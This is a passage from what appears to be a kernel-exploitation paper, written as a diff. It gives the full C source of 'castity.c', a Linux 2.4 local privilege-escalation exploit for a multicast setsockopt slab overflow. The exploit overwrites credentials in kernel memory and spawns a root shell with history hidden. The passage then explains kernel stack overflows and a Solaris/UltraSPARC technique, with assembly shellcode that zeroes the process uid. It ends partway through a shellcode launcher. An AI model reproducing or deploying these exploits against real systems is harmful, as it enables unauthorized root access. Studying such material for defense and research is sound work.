+every __kernel_sockaddr_storage present in the gsf struct we need a pretty
+large one to reach the 'shm_file' pointer, and so we need to pass a large
+'optlen' value.
+The 0x40000005 - 0x4000000c range, thou, makes the GROUP_FILTER_SIZE() macro
+used at [4] evaluate to a positive and small value, which isn't large
+enough to reach the 'shm_file' pointer. 
+
+We solved that problem thanks to the fact that, once an object is free'd,
+its 'memory contents' are not zero'ed (or cleaned in any way). 
+Since the copy_from_user at [3] happens _before_ the check at [4], we were
+able to create a sequence of 1024-sized objects by repeatedly issuing a
+failing (at [4]) 'setsockopt', thus obtaining a large-enough one. 
+
+Hoping to make it clearer let's sum up the steps :        
+
+  - fill the 1024 slabs so that at next allocation a fresh one is returned 
+  - alloc the first object of the new 1024-slab.
+  - use as many 'failing' setsockopt as needed to copy values inside
+    objects 2 and 3 [and 4, if needed, not the usual case thou] 
+  - free the first object 
+  - use a smaller (but still 1024-slab allocation driving) value for
+    optlen that would pass the check at [4] 
+
+At that point the gsf pointer points to the first object inside our
+freshly created slab. Objects 2 and 3 haven't been re-used yet, so still
+contains our data. Since the objects inside the slab are adiacent we have
+a de-facto larger (and large enough) gsf struct to reach the 'shm_file'
+pointer. 
+
+Last note, to reliably fill the slabs we check /proc/slabinfo. 
+The exploit, called castity.c, was written when the advisory went out, and
+is only for 2.4.* kernels (the sys_epoll vulnerability [12] was more than 
+enough for 2.6.* ones ;) )
+
+Exploit follows, just without the initial header, since the approach has
+been already extensively explained above.
+    
+< stuff/expl/linux/castity.c >
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/shm.h>
+#include <sys/socket.h>
+#include <sys/resource.h>
+#include <sys/wait.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <errno.h>
+
+#define __u32           unsigned int
+#define MCAST_MSFILTER  48
+#define SOL_IP          0
+#define SIZE            4096
+#define R_FILE          "/etc/passwd"    // Set it to whatever file you
+can read. It's just for 1024 filling.
+
+struct in_addr {
+   unsigned int   s_addr;
+};
+
+#define __SOCK_SIZE__   16
+
+struct sockaddr_in {
+  unsigned short        sin_family;     /* Address family               */
+  unsigned short int    sin_port;       /* Port number                  */
+  struct in_addr        sin_addr;       /* Internet address             */
+
+  /* Pad to size of `struct sockaddr'. */
+  unsigned char         __pad[__SOCK_SIZE__ - sizeof(short int) -
+                        sizeof(unsigned short int) - sizeof(struct
+in_addr)];
+};
+
+struct group_filter
+{
+        __u32                   gf_interface;   /* interface index */
+        struct sockaddr_storage gf_group;       /* multicast address */
+        __u32                   gf_fmode;       /* filter mode */
+        __u32                   gf_numsrc;      /* number of sources */
+        struct sockaddr_storage gf_slist[1];    /* interface index */
+};
+
+struct  damn_inode      {
+        void            *a, *b;
+        void            *c, *d;
+        void            *e, *f;
+        void            *i, *l;
+        unsigned long   size[40];  // Yes, somewhere here :-)
+} le;
+
+
+struct  dentry_suck     {
+        unsigned int    count, flags;
+        void            *inode;
+        void            *dd;
+} fucking = { 0xbad, 0xbad, &le, NULL };
+
+struct  fops_rox        {
+        void            *a, *b, *c, *d, *e, *f, *g;
+        void            *mmap;
+        void            *h, *i, *l, *m, *n, *o, *p, *q, *r;
+        void            *get_unmapped_area;
+} chien;
+
+
+
+struct  file_fuck       {
+        void            *prev, *next;
+        void            *dentry;
+        void            *mnt;
+        void            *fop;
+} gagne = { NULL, NULL, &fucking, NULL, &chien };
+
+
+
+static char     stack[16384];
+
+int             gotsig = 0,
+                fillup_1024 = 0,
+                fillup_64 = 0,
+                uid, gid;
+
+int             *pid, *shmid;
+
+
+
+static void sigusr(int b)
+{
+        gotsig = 1;
+}
+
+void fatal (char *str)
+{
+        fprintf(stderr, "[-] %s\n", str);
+        exit(EXIT_FAILURE);
+}
+
+#define BUFSIZE 256
+
+int calculate_slaboff(char *name)
+{
+        FILE *fp;
+        char slab[BUFSIZE], line[BUFSIZE];
+        int ret;
+        /* UP case */
+        int active_obj, total;
+
+        bzero(slab, BUFSIZE);
+        bzero(line, BUFSIZE);
+
+        fp = fopen("/proc/slabinfo", "r");
+        if ( fp == NULL )
+                fatal("error opening /proc for slabinfo");
+
+        fgets(slab, sizeof(slab) - 1, fp);
+        do {
+                ret = 0;
+                if (!fgets(line, sizeof(line) - 1, fp))
+                        break;
+                ret = sscanf(line, "%s %u %u", slab, &active_obj, &total);
+        } while (strcmp(slab, name));
+
+        close(fileno(fp));
+        fclose(fp);
+
+        return ret == 3 ? total - active_obj : -1;
+
+}
+
+int populate_1024_slab()
+{
+        int fd[252];
+        int i;
+
+        signal(SIGUSR1, sigusr);
+
+        for ( i = 0; i < 252 ; i++)
+                fd[i] = open(R_FILE, O_RDONLY);
+
+        while (!gotsig)
+                pause();
+        gotsig = 0;
+
+        for ( i = 0; i < 252; i++)
+                close(fd[i]);
+
+}
+
+
+int kernel_code()
+{
+        int i, c;
+        int *v;
+
+        __asm__("movl   %%esp, %0" : : "m" (c));
+
+        c &= 0xffffe000;
+         v = (void *) c;
+
+
+        for (i = 0; i < 4096 / sizeof(*v) - 1; i++) {
+                if (v[i] == uid && v[i+1] == uid) {
+                        i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
+                }
+                if (v[i] == gid) {
+                        v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
+                        return -1;
+                }
+        }
+
+        return -1;
+}
+
+
+
+
+void    prepare_evil_file ()
+{
+        int i = 0;
+
+        chien.mmap = &kernel_code ;   // just to pass do_mmap_pgoff check
+        chien.get_unmapped_area = &kernel_code;
+
+        /*
+         * First time i run the exploit i was using a precise offset for
+         * size, and i calculated it _wrong_. Since then my lazyness took
+	 * over and i use that ""very clean"" *g* approach.
+         * Why i'm telling you ? It's 3 a.m., i don't find any better than
+         * writing blubbish comments
+         */
+
+        for ( i = 0; i < 40; i++)
+                le.size[i] = SIZE;
+
+}
+
+#define SEQ_MULTIPLIER  32768
+
+void    prepare_evil_gf ( struct group_filter *gf, int id )
+{
+        int                     filling_space = 64 - 4 * sizeof(int);
+        int                     i = 0;
+        struct sockaddr_in      *sin;
+
+        filling_space /= 4;
+
+        for ( i = 0; i < filling_space; i++ )
+        {
+              sin = (struct sockaddr_in *)&gf->gf_slist[i];
+              sin->sin_family = AF_INET;
+              sin->sin_addr.s_addr = 0x41414141;
+        }
+
+        /* Emulation of struct kern_ipc_perm */
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = IPC_PRIVATE;
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = uid;
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = gid;
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = uid;
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = gid;
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = -1;
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = id/SEQ_MULTIPLIER;
+
+        /* evil struct file address */
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = AF_INET;
+        sin->sin_addr.s_addr = (unsigned long)&gagne;
+
+        /* that will stop mcast loop */
+
+        sin = (struct sockaddr_in *)&gf->gf_slist[i++];
+        sin->sin_family = 0xbad;
+        sin->sin_addr.s_addr = 0xdeadbeef;
+
+        return;
+
+}
+
+void    cleanup ()
+{
+        int                     i = 0;
+        struct shmid_ds         s;
+
+        for ( i = 0; i < fillup_1024; i++ )
+        {
+                kill(pid[i], SIGUSR1);
+                waitpid(pid[i], NULL, __WCLONE);
+        }
+
+        for ( i = 0; i < fillup_64 - 2; i++ )
+                shmctl(shmid[i], IPC_RMID, &s);
+
+}
+
+
+#define EVIL_GAP        4
+#define SLAB_1024       "size-1024"
+#define SLAB_64         "size-64"
+#define OVF             21
+#define CHUNKS          1024
+#define LOOP_VAL        0x4000000f
+#define CHIEN_VAL       0x4000000b
+
+main()
+{
+        int                     sockfd, ret, i;
+        unsigned int            true_alloc_size, last_alloc_chunk, loops;
+        char                    *buffer;
+        struct group_filter     *gf;
+        struct shmid_ds         s;
+
+        char    *argv[] = { "le-chien", NULL };
+        char    *envp[] = { "TERM=linux", "PS1=le-chien\\$",
+"BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null",
+"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
+"HISTFILE=/dev/null", NULL };
+
+
+        true_alloc_size = sizeof(struct group_filter) - sizeof(struct
+sockaddr_storage) + sizeof(struct sockaddr_storage) * OVF;
+        sockfd = socket(AF_INET, SOCK_STREAM, 0);
+
+        uid = getuid();
+        gid = getgid();
+
+        gf = malloc (true_alloc_size);
+        if ( gf == NULL )
+                fatal("Malloc failure\n");
+
+        gf->gf_interface = 0;
+        gf->gf_group.ss_family = AF_INET;
+
+        fillup_64 = calculate_slaboff(SLAB_64);
+
+        if ( fillup_64 == -1 )
+                fatal("Error calculating slab fillup\n");
+
+        printf("[+] Slab %s fillup is %d\n", SLAB_64, fillup_64);
+
+        /* Yes, two would be enough, but we have that "sexy" #define, why
+don't use it ? :-) */
+
+        fillup_64 += EVIL_GAP;
+
+        shmid = malloc(fillup_64 * sizeof(int));
+        if ( shmid == NULL )
+                fatal("Malloc failure\n");
+
+        /* Filling up the size-64 and obtaining a new page with EVIL_GAP
+entries */
+
+        for ( i = 0; i < fillup_64; i++ )
+                shmid[i] = shmget(IPC_PRIVATE, 4096, IPC_CREAT|SHM_R);
+
+        prepare_evil_file();
+        prepare_evil_gf(gf, shmid[fillup_64 - 1]);
+
+        buffer = (char *)gf;
+
+        fillup_1024 = calculate_slaboff(SLAB_1024);
+        if ( fillup_1024 == -1 )
+                fatal("Error calculating slab fillup\n");
+
+        printf("[+] Slab %s fillup is %d\n", SLAB_1024, fillup_1024);
+
+        fillup_1024 += EVIL_GAP;
+
+
+        pid = malloc(fillup_1024 * sizeof(int));
+        if (pid  == NULL )
+                fatal("Malloc failure\n");
+
+        for ( i = 0; i < fillup_1024; i++)
+                pid[i] = clone(populate_1024_slab, stack + sizeof(stack) -
+4, 0, NULL);
+
+        printf("[+] Attempting to trash size-1024 slab\n");
+
+        /* Here starts the loop trashing size-1024 slab */
+
+        last_alloc_chunk = true_alloc_size % CHUNKS;
+        loops = true_alloc_size / CHUNKS;
+
+        gf->gf_numsrc = LOOP_VAL;
+
+        printf("[+] Last size-1024 chunk is of size %d\n",
+last_alloc_chunk);
+        printf("[+] Looping for %d chunks\n", loops);
+
+        kill(pid[--fillup_1024], SIGUSR1);
+        waitpid(pid[fillup_1024], NULL, __WCLONE);
+
+        if ( last_alloc_chunk > 512  )
+                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
+loops * CHUNKS, last_alloc_chunk);
+        else
+
+        /*
+         * Should never happen. If it happens it probably means that we've
+         * bigger datatypes (or slab-size), so probably
+         * there's something more to "fix me". The while loop below is
+         * already okay for the eventual fixing ;)
+         */
+  
+              fatal("Last alloc chunk fix me\n");
+
+        while ( loops > 1 )
+        {
+                kill(pid[--fillup_1024], SIGUSR1);
+                waitpid(pid[fillup_1024], NULL, __WCLONE);
+
+                ret = setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer +
+--loops * CHUNKS, CHUNKS);
+        }
+
+        /* Let's the real fun begin */
+
+        gf->gf_numsrc = CHIEN_VAL;
+
+        kill(pid[--fillup_1024], SIGUSR1);
+        waitpid(pid[fillup_1024], NULL, __WCLONE);
+
+        shmctl(shmid[fillup_64 - 2], IPC_RMID, &s);
+        setsockopt(sockfd, SOL_IP, MCAST_MSFILTER, buffer, CHUNKS);
+
+        cleanup();
+
+        ret = (unsigned long)shmat(shmid[fillup_64 - 1], NULL,
+SHM_RDONLY);
+
+
+        if ( ret == -1)
+        {
+                printf("Le Fucking Chien GAGNE!!!!!!!\n");
+                setresuid(0, 0, 0);
+                setresgid(0, 0, 0);
+                execve("/bin/sh", argv, envp);
+                exit(0);
+        }
+
+        printf("Here we are, something sucked :/ (if not L1_cache too big,
+probably slab align, retry)\n" );
+
+}
+   
+< / > 
+
+
+------[ 2.3 - Stack overflow vulnerabilities
+
+
+When a process is in 'kernel mode' it has a stack which is different from
+the stack it uses at userland. We'll call it 'kernel stack'. 
+That kernel stack is usually limited in size to a couple of pages (on
+Linux, for example, it is 2 pages, 8kb, but an option at compile time 
+exist to have it limited at one page) and is not a surprise that a common
+design practice in kernel code developing is to use locally to a function
+as little stack space as possible.
+
+At a first glance, we can imagine two different scenarios that could go
+under the name of 'stack overflow vulnerabilities' :
+
+ - 'standard' stack overflow vulnerability : a write past a buffer on the
+   stack overwrites the saved instruction pointer or the frame pointer
+   (Solaris only, Linux is compiled with -fomit-frame-pointer) or some
+   variable (usually a pointer) also located in the stack. 
+
+ - 'stack size overflow' : a deeply nested callgraph goes further the
+   alloc'ed stack space.  
+
+Stack based explotation is more architectural and o.s. specific than the
+already presented slab based one.
+That is due to the fact that once the stack is trashed we achieve
+execution flow hijack, but then we must find a way to somehow return to
+userland. We con't cover here the details of x86 architecture, since those
+have been already very well explained by noir in his phrack60 paper [13]. 
+
+We will instead focus on the UltraSPARC architecture and on its more
+common operating system, Solaris. The next subsection will describe the
+relevant details of it and will present a technique which is suitable
+aswell for the exploiting of slab based overflow (or, more generally,
+whatever 'controlled flow redirection' vulnerability). 
+
+The AMD64 architecture won't be covered yet, since it will be our 'example
+architecture' for the next kind of vulnerabilities (race condition). The
+sendmsg [5] exploit proposed later on is, at the end, a stack based one.
+
+Just before going on with the UltraSPARC section we'll just spend a couple
+of words describing the return-to-ring3 needs on an x86 architecture and
+the Linux use of the kernel stack (since it quite differs from the Solaris
+one). 
+
+Linux packs together the stack and the struct associated to every process
+in the system (on Linux 2.4 it was directly the task_struct, on Linux 2.6
+it is the thread_info one, which is way smaller and keeps inside a pointer
+to the task_struct). This memory area is, by default, 8 Kb (a kernel
+option exist to have it limited to 4 Kb), that is the size of two pages,
+which are allocated consecutively and with the first one aligned to a 2^13
+multiple. The address of the thread_struct (or of the task_struct) is thus
+calculable at runtime by masking out the 13 least significant bits of the
+Kernel Stack (%esp).  
+
+The stack starts at the bottom of this page and 'grows' towards the top,
+where the thread_info (or the task_struct) is located. To prevent the
+'second' type of overflow when the 4 Kb Kernel Stack is selected at
+compile time, the kernel uses two adjunctive per-CPU stacks, one for
+interrupt handling and one for softirq and tasklets functions, both one
+page sized. 
+
+It is obviously on the stack that Linux stores all the information to
+return from exceptions, interrupts or function calls and, logically, to 
+get back to ring3, for example by means of the iret instruction. 
+If we want to use the 'iret' instruction inside our shellcodes to get out
+cleanly from kernel land we have to prepare a fake stack frame as it
+expects to find.
+
+We have to supply:
+  - a valid user space stack pointer
+  - a valid user space instruction pointer
+  - a valid EFLAGS saved EFLAGS register
+  - a valid User Code Segment
+  - a valid User Stack Segment
+
+ LOWER ADDRESS
+ +-----------------+
+ |                 |
+ |   User SS       | -+
+ |   User ESP      |  |
+ |   EFLAGS        |  |  Fake Iret Frame
+ |   User CS       |  |
+ |   User EIP      | -+  <----- current kernel stack pointer (ESP)
+ |                 |
+ +-----------------+
+ 
+We've added a demonstrative stack based exploit (for the Linux dummy 
+driver) which implements a shellcode doing that recovery-approach :
+
+  movl   $0x7b,0x10(%esp)       // user stack segment (SS)
+  movl   $stack_chunk,0xc(%esp) // user stack pointer (ESP)
+  movl   $0x246,0x8(%esp)       // valid EFLAGS saved register
+  movl   $0x73,0x4(%esp)        // user code segment (CS)
+  movl   $code_chunk,0x0(%esp)  // user code pointer  (EIP)
+  iret
+
+You can find it in < expl/linux/stack_based.c > 
+
+
+---[ 2.3.1 - UltraSPARC exploiting
+
+
+The UltraSPARC [14] is a full implementation of the SPARC V9 64-bit [2] 
+architecture. The most 'interesting' part of it from an exploiting
+perspective is the support it gives to the operating system for a fully
+separated address space among userspace and kernelspace.
+
+This is achieved through the use of context registers and address space
+identifiers 'ASI'. The UltraSPARC MMU provides two settable context
+registers, the primary (PContext) and the secondary (SContext) one. One
+more context register hardwired to zero is provided, which is the nucleus
+context ('context' 0 is where the kernel lives).
+To every process address space is associated a 'context value', which is
+set inside the PContext register during process execution. This value is
+used to perform memory addresses translation. 
+
+Every time a process issues a trap instruction to access kernel land (for
+example ta 0x8 or ta 0x40, which is how system call are implemented on
+Solaris 10), the nucleus context is set as default. The process context
+value (as recorded inside PContext) is then moved to SContext, while the
+nucleus context becomes the 'primary context'. 
+
+At that point the kernel code can access directly the userland by
+specifying the correct ASI to a load or store alternate instruction
+(instructions that support a direct asi immediate specified - lda/sta). 
+Address Space Identifiers (ASIs) basically specify how those instruction
+have to behave :
+
+< usr/src/uts/sparc/v9/sys/asi.h >
+
+#define ASI_N                   0x04    /* nucleus */
+#define ASI_NL                  0x0C    /* nucleus little */
+#define ASI_AIUP                0x10    /* as if user primary */
+#define ASI_AIUS                0x11    /* as if user secondary */
+#define ASI_AIUPL               0x18    /* as if user primary little */
+#define ASI_AIUSL               0x19    /* as if user secondary little */
+
+[...]
+
+#define ASI_USER        ASI_AIUS
+
+< / > 
+
+Theese are ASI that are specified by the SPARC v9 reference (more ASI are
+machine dependant and let modify, for example, MMU or other hardware
+registers, check usr/src/uts/sun4u/sys/machasi.h), the 'little' version is
+just used to specify a byte ordering access different from the 'standard'
+big endian one (SPARC v9 can access data in both formats).
+
+The ASI_USER is the one used to access, from kernel land, the user space. 
+An instruction like :
+
+       ldxa [addr]ASI_USER, %l1 
+
+would just load the double word stored at 'addr', relative to the address
+space contex stored in the SContext register, 'as if' it was accessed by
+userland code (so with all protection checks). 
+
+It is thus possible, if able to start executing a minimal stub of code, to
+copy bytes from the userland wherever we want at kernel land.  
+
+But how do we execute code at first ? Or, to make it even more clearer,
+where do we return once we have performed our (slab/stack) overflow and
+hijacked the instruction pointer ? 
+
+To complicate things a little more, the UltraSPARC architecture implements
+the execution bit permission over TTEs (Translation Table Entry, which are
+the TLB entries used to perform virtual/physical translations). 
+
+It is time to give a look at Solaris Kernel implementation to find a
+solution. The technique we're going to present now (as you'll quickly
+figure out) is not limited to stack based exploiting, but can be used
+every time you're able to redirect to an arbitrary address the instruction 
+flow at kernel land.
+
+
+---] 2.3.2 - A reliable Solaris/UltraSPARC exploit
+
+
+The Solaris process model is slightly different from the Linux one. The
+foundamental unit of scheduling is the 'kernel thread' (described by the
+kthread_t structure), so one has to be associated to every existing LWP 
+(light-weight process) in a process.
+LWPs are just kernel objects which represent the 'kernel state' of every
+'user thread' inside a process and thus let each one enter the kernel
+indipendently (without LWPs, user thread would contend at system call).
+
+The information relative to a 'running process' are so scattered among
+different structures. Let's see what we can make out of them. 
+Every Operating System (and Solaris doesn't differ) has a way to quickly
+get the 'current running process'. On Solaris it is the 'current kernel
+thread' and it's obtained, on UltraSPARC, by :
+
+#define curthread       (threadp())  
+
+< usr/src/uts/sparc/ml/sparc.il >
+
+! return current thread pointer
+
+        .inline threadp,0
+        .register %g7, #scratch
+        mov     %g7, %o0
+        .end
+
+< / > 
+
+It is thus stored inside the %g7 global register. 
+From the kthread_t struct we can access all the other 'process related'
+structs. Since our main purpose is to raise privileges we're interested in
+where the Solaris kernel stores process credentials. 
+
+Those are saved inside the cred_t structure pointed to by the proc_t one :
+
+# mdb -k
+Loading modules: [ unix krtld genunix ip usba nfs random ptm ]
+> ::ps ! grep snmpdx
+R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
+> 0000030000e67488::print proc_t
+{
+    p_exec = 0x30000e5b5a8
+    p_as = 0x300008bae48
+    p_lockp = 0x300006167c0
+    p_crlock = {
+        _opaque = [ 0 ]
+    }
+    p_cred = 0x3000026df28
+[...]
+> 0x3000026df28::print cred_t
+{
+    cr_ref = 0x67b
+    cr_uid = 0
+    cr_gid = 0
+    cr_ruid = 0
+    cr_rgid = 0
+    cr_suid = 0
+    cr_sgid = 0
+    cr_ngroups = 0
+    cr_groups = [ 0 ]
+}
+> ::offsetof proc_t p_cred
+offsetof (proc_t, p_cred) = 0x20
+> ::quit
+
+#
+
+The '::ps' dcmd ouput introduces a very interesting feature of the Solaris
+Operating System, which is a god-send for exploiting.
+The address of the proc_t structure in kernel land is exported to
+userland : 
+
+bash-2.05$ ps -aef -o addr,comm | grep snmpdx
+     30000e67488 /usr/lib/snmp/snmpdx
+bash-2.05$
+
+At a first glance that could seem of not great help, since, as we said, 
+the kthread_t struct keeps a pointer to the related proc_t one :
+
+> ::offsetof kthread_t t_procp
+offsetof (kthread_t, t_procp) = 0x118
+> ::ps ! grep snmpdx
+R    278      1    278    278     0 0x00010008 0000030000e67488 snmpdx
+> 0000030000e67488::print proc_t p_tlist
+p_tlist = 0x30000e52800
+> 0x30000e52800::print kthread_t t_procp
+t_procp = 0x30000e67488
+>
+
+To understand more precisely why the exported address is so important we
+have to take a deeper look at the proc_t structure. 
+This structure contains the user_t struct, which keeps information like
+the program name, its argc/argv value, etc : 
+
+> 0000030000e67488::print proc_t p_user
+[...]
+    p_user.u_ticks = 0x95c
+    p_user.u_comm = [ "snmpdx" ]
+    p_user.u_psargs = [ "/usr/lib/snmp/snmpdx -y -c /etc/snmp/conf" ]
+    p_user.u_argc = 0x4
+    p_user.u_argv = 0xffbffcfc
+    p_user.u_envp = 0xffbffd10
+    p_user.u_cdir = 0x3000063fd40
+[...]
+
+We can control many of those. 
+Even more important, the pages that contains the process_cache (and thus
+the user_t struct), are not marked no-exec, so we can execute from there
+(for example the kernel stack, allocated from the seg_kp [kernel pageable
+memory] segment, is not executable). 
+
+Let's see how 'u_psargs' is declared :
+
+< usr/src/common/sys/user.h >
+#define PSARGSZ         80      /* Space for exec arguments (used by
+ps(1)) */
+#define MAXCOMLEN       16      /* <= MAXNAMLEN, >= sizeof (ac_comm) */
+
+[...]
+
+typedef struct  user {
+        /*
+         * These fields are initialized at process creation time and never
+         * modified.  They can be accessed without acquiring locks.
+         */
+        struct execsw *u_execsw;        /* pointer to exec switch entry */
+        auxv_t  u_auxv[__KERN_NAUXV_IMPL]; /* aux vector from exec */
+        timestruc_t u_start;            /* hrestime at process start */
+        clock_t u_ticks;                /* lbolt at process start */
+        char    u_comm[MAXCOMLEN + 1];  /* executable file name from exec
+*/
+        char    u_psargs[PSARGSZ];      /* arguments from exec */
+        int     u_argc;                 /* value of argc passed to main()
+*/
+        uintptr_t u_argv;               /* value of argv passed to main()
+*/
+        uintptr_t u_envp;               /* value of envp passed to main()
+*/
+  
+[...]
+
+< / >
+
+The idea is simple : we put our shellcode on the command line of our
+exploit (without 'zeros') and we calculate from the exported proc_t
+address the exact return address.
+This is enough to exploit all those situations where we have control of
+the execution flow _without_ trashing the stack (function pointer
+overwriting, slab overflow, etc). 
+
+We have to remember to take care of the alignment, thou, since the
+UltraSPARC fetch unit raises an exception if the address it reads the
+instruction from is not aligned on a 4 bytes boundary (which is the size
+of every sparc instruction) :
+
+> ::offsetof proc_t p_user
+offsetof (proc_t, p_user) = 0x330
+> ::offsetof user_t u_psargs
+offsetof (user_t, u_psargs) = 0x161
+>
+
+Since the proc_t taken from the 'process cache' is always aligned to an 8
+byte boundary, we have to jump 3 bytes after the starting of the u_psargs
+char array (which is where we'll put our shellcode).  
+That means that we have space for 76 / 4 = 19 instructions, which is
+usually enough for average shellcodes.. but space is not really a limit
+since we can 'chain' more psargs struct from different processes, simply
+jumping from each others. Moreover we could write a two stage shellcode
+that would just start copying over our larger one from the userland using
+the load from alternate space instructions presented before. 
+
+We're now facing a slightly more complex scenario, thou, which is the
+'kernel stack overflow'. We assume here that you're somehow familiar with
+userland stack based exploiting (if you're not you can check [15] and
+[16]). 
+The main problem here is that we have to find a way to safely return to
+userland once trashed the stack (and so, to reach the instruction pointer,
+the frame pointer). A good way to understand how the 'kernel stack' is
+used to return to userland is to follow the path of a system call. 
+You can get a quite good primer here [17], but we think that a read
+through opensolaris sources is way better (you'll see also, following the
+sys_trap entry in uts/sun4u/ml/mach_locore.s, the code setting the nucleus
+context as the PContext register). 
+
+Let's focus on the 'kernel stack' usage : 
+
+< usr/src/uts/sun4u/ml/mach_locore.s >
+
+        ALTENTRY(user_trap)
+        !
+        ! user trap
+        !
+        ! make all windows clean for kernel
+        ! buy a window using the current thread's stack
+        !
+        sethi   %hi(nwin_minus_one), %g5
+        ld      [%g5 + %lo(nwin_minus_one)], %g5
+        wrpr    %g0, %g5, %cleanwin
+        CPU_ADDR(%g5, %g6)
+        ldn     [%g5 + CPU_THREAD], %g5
+        ldn     [%g5 + T_STACK], %g6
+        sub     %g6, STACK_BIAS, %g6
+        save    %g6, 0, %sp
+  
+< / > 
+
+In %g5 is saved the number of windows that are 'implemented' in the
+architecture minus one, which is, in that case, 8 - 1 = 7.
+CLEANWIN is set to that value since there are no windows in use out of the
+current one, and so the kernel has 7 free windows to use. 
+
+The cpu_t struct addr is then saved in %g5 (by CPU_ADDR) and, from there,
+the thread pointer [ cpu_t->cpu_thread ] is obtained. 
+From the kthread_t struct is obtained the 'kernel stack address' [the
+member name is called t_stk]. This one is a good news, since that member
+is easy accessible from within a shellcode (it's just a matter of
+correctly accessing the %g7 / thread pointer). From now on we can follow
+the sys_trap path and we'll be able to figure out what we will find on the
+stack just after the kthread_t->t_stk value and where. 
+
+To that value is then subtracted 'STACK_BIAS' : the 64-bit v9 SPARC ABI
+specifies that the %fp and %sp register are offset by a constant, the
+stack bias, which is 2047 bits. This is one thing that we've to remember
+while writing our 'stack fixup' shellcode. 
+On 32-bit running kernels the value of this constant is 0. 
+
+The save below is another good news, because that means that we can use
+the t_stk value as a %fp (along with the 'right return address') to return
+at 'some valid point' inside the syscall path (and thus let it flow from
+there and cleanily get back to userspace). 
+
+The question now is : at which point ? Do we have to 'hardcode' that
+return address or we can somehow gather it ? 
+
+A further look at the syscall path reveals that :
+
+        ENTRY_NP(utl0)
+        SAVE_GLOBALS(%l7)
+        SAVE_OUTS(%l7)
+        mov     %l6, THREAD_REG
+        wrpr    %g0, PSTATE_KERN, %pstate       ! enable ints
+        jmpl    %l3, %o7                        ! call trap handler
+        mov     %l7, %o0
+
+And, that %l3 is : 
+
+have_win:
+        SYSTRAP_TRACE(%o1, %o2, %o3)
+
+
+        !
+        ! at this point we have a new window we can play in,
+        ! and %g6 is the label we want done to bounce to
+        !
+        ! save needed current globals
+        !
+        mov     %g1, %l3        ! pc
+        mov     %g2, %o1        ! arg #1
+        mov     %g3, %o2        ! arg #2
+        srlx    %g3, 32, %o3    ! pseudo arg #3
+        srlx    %g2, 32, %o4    ! pseudo arg #4
+ 
+%g1 was preserved since : 
+
+#define SYSCALL(which)                  \
+        TT_TRACE(trace_gen)             ;\
+        set     (which), %g1            ;\
+        ba,pt   %xcc, sys_trap          ;\
+        sub     %g0, 1, %g4             ;\
+        .align  32
+
+and so it is syscall_trap for LP64 syscall and syscall_trap32 for ILP32
+syscall. Let's check if the stack layout is the one we expect to find :
+
+> ::ps ! grep snmp
+R    291      1    291    291     0 0x00020008 0000030000db4060 snmpXdmid
+R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
+> ::ps ! grep snmpdx
+R    278      1    278    278     0 0x00010008 0000030000d2f488 snmpdx
+> 0000030000d2f488::print proc_t p_tlist
+p_tlist = 0x30001dd4800
+> 0x30001dd4800::print kthread_t t_stk
+t_stk = 0x2a100497af0 ""
+> 0x2a100497af0,16/K
+0x2a100497af0:  1007374         2a100497ba0     30001dd2048     1038a3c
+                1449e10         0               30001dd4800
+                2a100497ba0     ffbff700        3               3a980
+                0               3a980           0
+                ffbff6a0        ff1525f0        0               0
+                0               0               0
+                0
+> syscall_trap32=X
+                1038a3c
+>
+  
+Analyzing the 'stack frame' we see that the saved %l6 is exactly
+THREAD_REG (the thread value, 30001dd4800) and %l3 is 1038a3c, the
+syscall_trap32 address. 
+
+At that point we're ready to write our 'shellcode' : 
+
+# cat sparc_stack_fixup64.s
+
+.globl begin
+.globl end
+
+begin:
+        ldx [%g7+0x118], %l0
+        ldx [%l0+0x20], %l1
+        st %g0, [%l1 + 4]
+        ldx [%g7+8], %fp
+        ldx [%fp+0x18], %i7
+        sub %fp,2047,%fp
+        add 0xa8, %i7, %i7
+
+        ret
+        restore
+end:
+#
+
+At that point it should be quite readable : it gets the t_procp address
+from the kthread_t struct and from there it gets the p_cred addr.
+It then sets to zero (the %g0 register is hardwired to zero) the cr_uid
+member of the cred_t struct and uses the kthread_t->t_stk value to set
+%fp. %fp is then dereferenced to get the 'syscall_trap32' address and the
+STACK_BIAS subtraction is then performed. 
+
+The add 0xa8 is the only hardcoded value, and it's the 'return place'
+inside syscall_trap32. You can quickly derive it from a ::findstack dcmd
+with mdb. A more advanced shellcode could avoid this 'hardcoded value' by
+opcode scanning from the start of the syscall_trap32 function and looking
+for the jmpl %reg,%o7/nop sequence (syscall_trap32 doesn't get a new
+window, and stays in the one sys_trap had created) pattern. 
+On all the boxes we tested it was always 0xa8, that's why we just left it
+hardcoded. 
+
+As we said, we need the shellcode to be into the command line, 'shifted' 
+of 3 bytes to obtain the correct alignment. To achieve that a simple
+launcher code was used :
+
+bash-2.05$ cat launcer_stack.c
+#include <unistd.h>
+
+char sc[] = "\x66\x66\x66"              // padding for alignment
+"\xe0\x59\xe1\x18\xe2\x5c\x20\x20\xc0\x24\x60\x04\xfc\x59\xe0"
